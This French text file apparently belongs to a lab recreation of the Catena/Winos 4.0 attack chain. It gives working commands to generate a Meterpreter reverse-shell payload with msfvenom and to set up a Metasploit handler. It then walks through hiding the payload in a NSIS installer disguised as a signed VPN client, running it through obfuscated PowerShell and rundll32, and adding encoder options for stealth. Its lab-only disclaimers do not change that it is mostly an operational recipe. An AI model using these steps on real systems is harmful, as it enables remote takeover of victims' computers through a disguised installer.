# shellcode.bin.txt - Placeholder pour le Shellcode de Catena/Winos 4.0 # Instructions pour générer le shellcode malveillant utilisé dans l'attaque # À utiliser UNIQUEMENT dans un lab sécurisé (article 323-1 CP) # Par Platon-Y pour PCtamalou.fr/catcatcat/ # === CONTEXTE === # Dans l'attaque Catena, le shellcode est le cœur du payload initial, déployé par # l’installateur NSIS (catena.nsi) et exécuté via rundll32 par payload.ps1. Il # établit une connexion reverse Meterpreter vers l'attaquant, simulant Winos 4.0. # === GÉNÉRATION DU SHELLCODE === # Le shellcode est généré avec msfvenom sur Kali Linux. Commande principale : msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=4444 -f raw -o /tmp/shellcode.bin # --- Explication des paramètres --- # -p windows/x64/meterpreter/reverse_tcp : Payload Meterpreter pour Windows 64 bits # LHOST=192.168.1.6 : IP de l'attaquant (Kali) # LPORT=4444 : Port pour la connexion reverse # -f raw : Format brut (shellcode pur) # -o /tmp/shellcode.bin : Chemin de sortie # === PRÉREQUIS === # - Kali Linux avec Metasploit : sudo apt install metasploit-framework # - Réseau lab sécurisé : 192.168.1.6 (attaquant), 192.168.1.7 (cible Windows) # - Handler Metasploit configuré (voir ci-dessous) # === CONFIGURATION DU HANDLER === # Ouvre Metasploit pour recevoir la connexion : msfconsole -q use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.6 set LPORT 4444 exploit -j # === UTILISATION === # 1. Génère le shellcode avec msfvenom. # 2. Copie shellcode.bin dans le répertoire de l’installateur NSIS : # cp /tmp/shellcode.bin /tmp/ (pour catena.nsi) # 3. Compile l’installateur : makensis /tmp/catena.nsi # 4. Transfère letsVPN_signed.exe vers la cible (voir catena.nsi). # 5. Exécute payload.ps1 pour lancer le shellcode via rundll32 : # powershell -ExecutionPolicy Bypass -File obf_payload.ps1 # 6. Vérifie la connexion Meterpreter : sessions -i 1 # === ADAPTATION === # - Change LHOST/LPORT selon ton lab (ex. : 10.10.10.6, port 443). # - Pour Windows 32 bits, utilise -p windows/meterpreter/reverse_tcp. # - Pour plus de furtivité, ajoute : -e x64/xor_dynamic -i 5 # - Si rundll32 échoue, teste un autre exécuteur (ex. : regsvr32). # === SÉCURITÉ === # Ce fichier est un placeholder textuel. Le shellcode est un binaire généré à la # volée. Ne génère/exécute JAMAIS hors lab sécurisé (article 323-1 CP). # === POUR LES NEWBIES === # Un shellcode, c’est comme une flèche empoisonnée : petit, discret, et mortel. # Il s’exécute via NSIS ou PowerShell pour te connecter à ton QG (Kali). # === RESSOURCES LIÉES === # - index.html (#nsis, #powershell) : Détails sur l’attaque # - catena.nsi : Installateur qui déploie le shellcode # - payload.ps1 : Script qui exécute le shellcode # - malicious.dll.txt : DLL reflective complémentaire # "One shot, one kill : sois précis, sois éthique." - Platon-Y